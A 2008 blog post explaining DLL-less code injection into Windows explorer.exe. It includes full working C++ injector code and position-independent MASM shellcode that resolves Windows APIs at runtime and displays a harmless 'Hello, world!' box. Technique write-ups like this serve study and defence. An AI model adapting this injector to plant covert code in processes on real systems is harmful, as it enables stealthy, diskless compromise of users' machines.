SIGTRAP: DLL-less Code Injection (...and the most complicated Hello, World! program ever written)

There is a common technique for subverting running processes on modern Windows systems known as DLL injection. I won't go into the details of it, but the basic idea is to force the target process to load a DLL containing code written by the attacker. When the DLL is loaded, its entry point function is executed (DLL_PROCESS_ATTACH event) and the DLL has a chance to do whatever it wants within the address space of the target process. This could include setting up threads to monitor the process, installing hooks on some of the process's functions to redirect execution - the opportunities for sneakiness and trickery are endless. There is tons of information about DLL injection on the web, here's one link: http://en.wikipedia.org/wiki/DLL_injection

DLL injection is a well-known technique, and there probably isn't much interesting to say about it that hasn't already been said before. What I am going to demonstrate is something much more exciting - code injection without the use of a DLL. The advantages of this are enormous: if you can inject code into a running process without using a DLL, you can get away without ever having to touch the filesystem - the piece of injected code only needs to exist in memory. Of course, you still need to be able to run the code that does the injection (the injector code, I'll call it) somehow. In the simplest case you might choose to do this by running an executable, and that executable would need to reside on disk. But there are conceivably other ways to get your injector code running on the target system. Here's some information about a Windows TCP/IP stack vulnerability that will frighten and amaze you: http://support.microsoft.com/kb/941644
Remote code execution (presumably in ring 0), and all modern versions of Windows are affected including 2000, XP, and Vista. It was discovered in early 2008. That's right, 2008. Of course it is now a known vulnerability and it has been fixed, but it proves that things like this are out there. Windows definitely has more of them, some of which haven't been discovered yet and, scarier still, some of which people have discovered but kept to themselves.

Anyway, the basics steps to DLL-less code injection are:
1) Find the process ID of the target process.
2) Open the target process.
3) Use VirtualAllocEx to allocate a chunk of memory in the address space of the target process. The allocated memory must be marked readable, writable, and executable.
4) Use WriteProcessMemory to copy a block of code (and probably data as well) to the memory allocated in step 3.
5) Use CreateRemoteThread to start up a thread (in the address space of the target process) that will begin executing the block of code copied in step 4.

We're going to do this using an 'injector' executable, and the block of code to be injected will be built and linked into our injector program. The first thing the injector program needs is a header file declaring two pointers: one points to the beginning of the injectable code block, and the other points to the end. This is the header file codeblk.h:

#ifndef _CODEBLK_H
#define _CODEBLK_H

#ifdef __cplusplus
extern "C" {
#endif
 
extern void *codeblk_start, *codeblk_end;

#ifdef __cplusplus
}
#endif

#endif

Next is the file winject.cpp, which contains code for finding the target process and doing the injection. For this example I use Windows explorer.exe as the target. This is the program that makes the start menu appear - Windows can actually run without it but in most cases it is always running while you are logged in.

//
// winject.cpp:
//   Inject the code from codeblk.asm into the Windows Explorer process.
//

#include "stdafx.h"
#include "codeblk.h"

// Convert a string (in place) to lowercase
static void strtolower(_TCHAR *s) {
    for (; *s; ++s) {
        if (*s >= 'A' && *s <= 'Z') {
            *s += ('a'-'A');
        }
    }
}

// Find the PIDs of all processes whose executable name matches the given name.
// Return them in a buffer, and return the number of pids in 'npids'. The caller
// is responsible for deallocating the returned buffer with 'free()'. The returned
// buffer will be NULL if 'npids' is 0.
static DWORD *getPids(const _TCHAR *exename, DWORD *npids) {

    #define PIDS_ALLOC_SIZE 10

    DWORD *pids = NULL;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 proc;
    DWORD pidsBufSize = 0;

    *npids = 0;

    if (hsnap != (HANDLE)-1) {
    
        if (Process32First(hsnap, &proc)) {
            do {
                strtolower(proc.szExeFile);
                if (strcmp(proc.szExeFile, exename) == 0) {

                    if (*npids == pidsBufSize) {
                        // Make more room for PIDs
                        pidsBufSize += PIDS_ALLOC_SIZE;
                        pids = (DWORD*)realloc(pids, pidsBufSize*sizeof(DWORD));
                    }

                    pids[(*npids)++] = proc.th32ProcessID;
                }
            } while (Process32Next(hsnap, &proc));
        }
        CloseHandle(hsnap);
    }

    return pids;

    #undef PIDS_ALLOC_SIZE
}

// Get the fully-qualified path to the Windows executable 'Explorer.exe'. We can't assume that
// it is on the C: drive, and we probably shouldn't assume the system directory is '\Windows' either.
static _TCHAR *getExplorerFullyQualifiedPath(DWORD *pathlen) {

    const _TCHAR *varname = "SystemRoot";
    const _TCHAR exename[] = "\\explorer.exe";
    _TCHAR *path = NULL;

    DWORD len = GetEnvironmentVariable(varname, NULL, 0);
    if (len) {
        *pathlen = len + sizeof(exename) - 1;
        path = (_TCHAR*)malloc(*pathlen);
        GetEnvironmentVariable(varname, path, len);
        strcat(path, exename);
    } else {
        // Can't think of a situation when 'SystemRoot' wouldn't be available, but...
        exit(1);
    }

    strtolower(path);
    return path;       
}

// Return the PID for Windows explorer. Returns 0 if an error occurs. One potential reason
// for failure is that explorer is not running.
static DWORD getExplorerPid(void) {
    const _TCHAR *pname = "explorer.exe";

    DWORD targetlen;
    _TCHAR *target = getExplorerFullyQualifiedPath(&targetlen);
    _TCHAR *tempPath = (_TCHAR*)malloc(targetlen);
    DWORD npids;
    DWORD epid = 0;             // PID for explorer

    // Find all matching pids
    DWORD *pids = getPids(pname, &npids);
 
    if (pids) {

        // Check fully-qualified path name for each
        for (DWORD n = 0; n < npids; ++n) {

            HANDLE hproc = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pids[n]);
            if (hproc) {

                if ( GetModuleFileNameEx(hproc, NULL, tempPath, targetlen) ) {

                    strtolower(tempPath);
                    if (strcmp(tempPath, target) == 0) {
                        // Found a match
                        epid = pids[n];
                        CloseHandle(hproc);
                        break;
                    }
                }

                CloseHandle(hproc);
            }
        }

        free(pids);
    }

    free(target);
    free(tempPath);
    return epid;
}

// Open and inject code into the process with the given PID. Returns a pointer to the
// injected code, or NULL if an error occurred. The returned pointer and process handle
// should be cleaned up using injectCleanup().
static void *inject(DWORD pid, HANDLE *hproc) {

    void *code = NULL;
    *hproc = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
                         PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (*hproc) {
        unsigned int codelen;
        __asm {
            mov eax, codeblk_end
            mov ecx, codeblk_start
            sub eax, ecx
            mov codelen, eax
        }

        // The allocated pages need to be writable so we can write the injected code to them
        // and so the injected code can store variables, and they also need to be executable
        // so the injected code can run.
        code = VirtualAllocEx(*hproc, NULL, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (code) {
            WriteProcessMemory(*hproc, code, codeblk_start, codelen, NULL);
        }
    }

    return code;
}

static HANDLE runInjectedCode(void *codeblk, HANDLE hproc) {

    if (!codeblk || !hproc) {
        return NULL;
    }

    #define MODULES_ALLOC_SIZE 1024

    // Enumerate all modules loaded by the process
    HMODULE *modules = NULL;
    DWORD nbuf = 0;
    DWORD nmod = 0;
    do {
        nbuf += MODULES_ALLOC_SIZE;
        modules = (HMODULE*)realloc(modules, nbuf);
        if (!EnumProcessModules(hproc, modules, nbuf, &nmod)) {
            if (modules) {
                free(modules);
            }
            return NULL;
        }
    } while (nmod >= nbuf);
 
    #undef MODULES_ALLOC_SIZE

    // Find kernel32.dll in the remote process. Chances are very good that it is loaded at
    // the same virtual address in our process and in the remote process, but this isn't
    // something we should depend on. Once we've found kernel32.dll, we calculate the address
    // of GetProcAddress() for the remote process.
    _TCHAR modname[sizeof("kernel32.dll")];
    FARPROC rmtGetProcAddr = NULL;
    for (unsigned int n = 0; n < nmod / sizeof(HMODULE); ++n) {
        if (GetModuleBaseName(hproc, modules[n], modname, sizeof(modname)) == sizeof(modname)-1) {
            strtolower(modname);
            if (strcmp(modname, "kernel32.dll") == 0) {

                // Get the address of the 'GetProcAddress' function in the remote process:
                //   1) Find address of 'GetProcAddress' within our address space
                //   2) Find offset of 'GetProcAddress' within kernel32.dll by subtracting our
                //      process's kernel32.dll module handle. This works because the module
                //      handle is simply the base address of the module.
                //   3) Add offset from step 2 to the kernel32.dll module handle for the remote
                //      process.
                HMODULE ourKernel32 = GetModuleHandle("kernel32");
                FARPROC ourGetProcAddr = GetProcAddress(ourKernel32, "GetProcAddress");
                if (ourKernel32 && ourGetProcAddr) {
                    HMODULE rmtKernel32 = modules[n];
                    __asm {
                        mov eax, ourGetProcAddr
                        sub eax, ourKernel32
                        add eax, rmtKernel32
                        mov rmtGetProcAddr, eax
                    }
                }

                break;
            }
        }
    }

    free(modules);

    if (!rmtGetProcAddr) {
        return NULL;
    }

    return CreateRemoteThread(hproc, NULL, 0, (LPTHREAD_START_ROUTINE)codeblk, rmtGetProcAddr, 0, NULL);
}

int _tmain(int argc, _TCHAR* argv[]) {

    DWORD pid = getExplorerPid();
    HANDLE hproc;
    void *codeblk = inject(pid, &hproc);
    HANDLE hthr = runInjectedCode(codeblk, hproc);

    CloseHandle(hthr);
    CloseHandle(hproc);

    return 0;
}

I'm not going to explain each line of the code, but here are a few things that are noteworthy:

1) The function 'getPids()' doesn't just find the first process with the module name "explorer.exe", it finds all of them. Later we sort through them to find the one from the system directory (it would be C:\Windows\explorer.exe on most systems). The reason for this is that not every module named "explorer.exe" is necessarily Windows explorer - you could easily rename one of your other applications "explorer.exe" and run it. I like being thorough.
2) String comparisons are case-insensitive, since Windows doesn't use case sensitivity for its file systems.
3) I use the base address of kernel32.dll within the injector program, the base address of kernel32.dll from the target process, and the distance from the beginning of kernel32.dll to the 'GetProcAddress' function to find the address of the 'GetProcAddress' within the target process. On Windows XP, I don't think any of this is necessary. IIRC, kernel32.dll is always loaded at base address 0x7c800000 for all processes. Since the base address of the DLL is the same for the injector program and the target process, the addresses of all kernel32.dll functions are the same for both processes and none of the arithmetic is necessary. However, I don't think Vista works this way - I've heard they intentionally use randomized base addresses for security reasons. I haven't tried running this program on Vista yet.
4) This code was written for MS Visual C++. My stdafx.h includes windows.h, tlhelp32.h, and psapi.h. These 3 files need to get included somehow, however you do it.
5) I use assembly in a few places to do pointer arithmetic. You can do it with casts instead but it looks just as dirty and Visual Studio will bitch and moan about pointer truncation.
6) The single 4-byte argument that gets passed to the remote thread upon its creation is 'rmtGetProcAddr'. This is the address of the 'GetProcAddress' function within the target process.

Okay, so now we have a program that can inject code into explorer.exe. The only thing left is to create the code that gets injected. And this is the really ugly, difficult part. The basic problem with the injected block is that as soon as we run it within the target process, it suddenly knows nothing about what is around it. It is all alone in the unfamiliar world of another process and it has nothing with it except the little four-byte argument that was passed to CreateRemoteThread when we called it. It's tempting for us to start off our injectable code block by doing something like this:

MessageBox(NULL, "This is a test", "Test", MB_OK);

...But it is not going to be nearly that easy. That will compile and link. But the compiled code will refer to the MessageBox function within the address space of the injector program. The MessageBox function may be in a different place in the target process, so the address won't work any more after the code is copied over. Also, the two strings "This is a test" and "Test" will be stored in a data section of the injector program, and the compiled code will refer to them by their addresses. Once the code is copied over, these addresses are meaningless and there is no way to get at the strings - they are in the data portion of a different process. There are other problems too, such as the stack checks and security cookies that Visual Studio inserts into your code to detect buffer overflows - these also use addresses that will become meaningless when you copy the code over. The stack checks can be disabled, but the problem of being able to access strings and other data from the injected code can't reasonably be solved with C. We will end up having no choice but to resort to assembly if we actually want to _do_ anything.

The simplest possible piece of injected code we can create just returns immediately. Here is code for MASM:

.686P
.model flat

; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE

codeblk SEGMENT

; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
   xor eax, eax
   ret 4
_threadMain ENDP

   ; This should be the last thing in the code block
   PUBLIC _codeblk_end
   PUBLIC _codeblk_start
   _codeblk_end        dd  _codeblk_end
   _codeblk_start      dd  _threadMain

codeblk ENDS
END

Not terribly interesting, but it's a start. Now, the only thing we have is the address of the 'GetProcAddress' function, so we can call that to find out where various other API functions are. But there are two problems:
1) The first argument to GetProcAddress is a module handle. We don't have any module handles.
2) The second argument to GetProcAddress is a string. We have to be able to pass the address of a string somehow.

The solution to problem 1) is a dirty, dirty hack. We know that the address of 'GetProcAddress' is an address within kernel32.dll. We know that Windows always loads DLLs with base addresses that end in 0x0000 (or at least I think it does). Finally, we know that the function GetProcAddress appears well within the first 0x10000 bytes of kernel32.dll. This means we can just chop off the low 16 bits of the address and we have a module handle. Yay!

The solution to problem 2) involves something that we can't do with C. When we put strings in our C code they are actually placed in a separate data section in the executable. We need the data to sit right next to the code so it all gets copied over together. When the data and code are sitting next to each other, there is some distance between them that doesn't change. That is exactly what we need. If the injected code can find the absolute address of some part of itself, and if it can find the distance from there to the beginning of the data, then it can find the absolute address of the data. A piece of code can find it's own address by doing something like this:

   call GRAB_EIP     ; Pushes return address. Return address is address of GRAB_EIP
   GRAB_EIP:
   pop eax           ; Pop address of GRAB_EIP off the stack into eax

That is essentially like saying 'mov eax, eip', except that that isn't a valid instruction.

Once we can use strings and call GetProcAddress, we're pretty much in the clear. We can use GetProcAddress to find GetModuleHandle or LoadLibrary, which means we can then get the addresses of functions from DLLs other than kernel32. The example code below demonstrates everything explained so far. It contains a table of modules and functions, and _linkFunctions loads each of the modules and fills the table in with the addresses of the functions. I call the MessageBox function to show that it works.

.686P
.model flat

; Some versions of MASM make procedures public by default. Pain in the ass.
OPTION PROC:PRIVATE

MB_OK              EQU  0
MB_ICONASTERISK    EQU  040h

codeblk SEGMENT

; Entry point for remote thread. This must be the first thing in the code block
_threadMain PROC
    push [esp+4]
    call _linkFunctions

    ; Display a 'Hello, world!' message box to prove our function table works
    pushd MB_OK OR MB_ICONASTERISK                     ; Type flags
    lea edx, [esp][-12]
    pushd edx                                          ; Caption (empty string). Use the address of the null HWND.
    call _getDataStartPointer
    lea ecx, [eax][helloWorldStr-DATA_START]
    push ecx                                           ; Message string
    pushd 0                                            ; HWND (null)
    add eax, pMessageBoxA-DATA_START
    call dword ptr [eax]

    xor eax, eax
    ret 4
_threadMain ENDP

; Fills in the function table. Single argument is the address of the GetProcAddress function
_linkFunctions PROC
    push ebp
    mov ebp, esp
    push ebx                                           ; Holds address of 'GetProcAddress'
    push esi                                           ; Holds address of 'LoadLibraryA'
    push edi                                           ; Holds address of data in data table
    
    ; We get a module handle (base address) for kernel32.dll by truncating the lower 16 bits
    ; from our 'GetProcAddress' pointer. This works because 'GetProcAddress' (currently) appears
    ; within the first 0x10000 bytes of kernel32, and because Windows maps DLLs to base addresses
    ; divisible by 0x10000 (or at least it always seems to - that may not even be guaranteed).
    ; This is a bit of a hack.
    mov ebx, [ebp+8]
    mov edx, ebx
    xor dx, dx
 
    call _getDataStartPointer
    mov edi, eax
    add eax, loadLibraryStr-DATA_START
    push eax                                          ; 'LoadLibrary' string
    push edx                                          ; Handle to kernel32                                   
    call ebx                                          ; Get the address of LoadLibraryA()
    mov esi, eax
 
    add edi, runtimeLinkFunctionTable-DATA_START      ; Get first module name
    
    FOR_EACH_MODULE:
    mov dx, di                                        ; These four instructions use some trickery to
    neg dl                                            ;     round edi up to the nearest dword boundary.
    and edx, 03h
    add edi, edx
    add edi, 4                                        ; Skip past module instance handle
    mov dl, [edi]
    test dl, dl                                       ; Check for empty module name
    jz FOR_EACH_MODULE_END
    push edi                                          ; Module name
    call esi                                          ; LoadLibrary
    mov [edi-4], eax                                  ; Save instance handle in the table
    push eax                                          ; Save the instance handle on the stack too
    
    FOR_EACH_FUNCTION:
    xor al, al
    repnz scasb                                       ; Find the end of the current string
    mov dx, di                                        ; Align edi to dword boundary, just as we did above
    neg dl
    and edx, 03h
    add edi, edx
    add edi, 4                                        ; Skip past the address at the beginning of the next entry
    mov dl, [edi]
    test dl, dl                                       ; Check for empty function name
    jz FOR_EACH_FUNCTION_END
    
    push edi                                          ; Function name
    push [esp+4]                                      ; Instance handle
    call ebx                                          ; Call GetProcAddress()
    mov [edi-4], eax                                  ; Store the function address in the table
    
    jmp FOR_EACH_FUNCTION
    FOR_EACH_FUNCTION_END:
    
    pop eax
    inc edi                                            ; Go to next module
    jmp FOR_EACH_MODULE
    FOR_EACH_MODULE_END:
    
    pop edi
    pop esi
    pop ebx
    pop ebp
    ret 4
_linkFunctions ENDP

; Find an absolute address of the start of the data based on the absolute address in 
; EIP and the difference between this function's location and DATA_START.
; Returns result in eax and doesn't trash any other registers.
_getDataStartPointer PROC
    call GRAB_EIP
    GRAB_EIP:
    pop eax
    add eax, DATA_START-GRAB_EIP
    ret
_getDataStartPointer ENDP

; The data, which we keep separate although it is all part of the same code segment
DATA_START:

    loadLibraryStr             db  'LoadLibraryA',0
    helloWorldStr              db  'Hello, world!',0

    ; Functions we link to at runtime. The format is:
    ;   [instance handle for module 1][name of module 1],0
    ;   [address of function 1 from module 1][name of function 1 from module 1],0
    ;   [address of function 2 from module 1][name of function 2 from module 1],0
    ;   ...
    ;   [address of function N from module 1][name of function N from module 1],0
    ;   [dummy address (four zero bytes)], 0
    ;   [instance handle for module 2][name of module 2],0
    ;   [address of function 1 from module 2][name of function 1 from module 2],0
    ;   ...etc.
    ;
    Func MACRO name
      ALIGN 4
      p&name  dd  ?
              db  '&name',0 
    ENDM
    
    ModuleFuncTable MACRO name
      ALIGN 4
      pmod&name  dd  ?
                 db  '&name',0
    ENDM
    
    TableEnd MACRO
      ALIGN 4
      db  5  dup (?)
    ENDM
    
    ALIGN 4
    runtimeLinkFunctionTable:
        
        ModuleFuncTable  Kernel32
            Func  GetProcAddress
            Func  GetModuleHandleA
        TableEnd
 
        ModuleFuncTable  Gdi32
            Func  CreateCompatibleDC
            Func  CreateCompatibleBitmap
            Func  DeleteDC
            Func  DeleteObject
            Func  SelectObject
        TableEnd
                      
        ModuleFuncTable  Msimg32
            Func  GradientFill
        TableEnd     
                              
        ModuleFuncTable  User32
            Func  CreateWindowExA
            Func  DestroyWindow
            Func  GetDC
            Func  GetSystemMetrics
            Func  MessageBoxA
            Func  PeekMessageA
            Func  DispatchMessageA
            Func  ReleaseDC
            Func  SendMessageA
            Func  SetWindowPos
            Func  ShowWindow
        TableEnd
         
    TableEnd 


    ; This should be the last thing in the code block
    PUBLIC _codeblk_end
    PUBLIC _codeblk_start
    _codeblk_end        dd  _codeblk_end
    _codeblk_start      dd  _threadMain


codeblk ENDS
END

When built properly, this code should run fine on any XP system. It works fine even when explorer.exe is protected by DEP. I haven't tested it on Vista yet.

Have fun!

SIGTRAP

Monday, February 04, 2008

DLL-less Code Injection (...and the most complicated Hello, World! program ever written)

0 Comments:

Previous Posts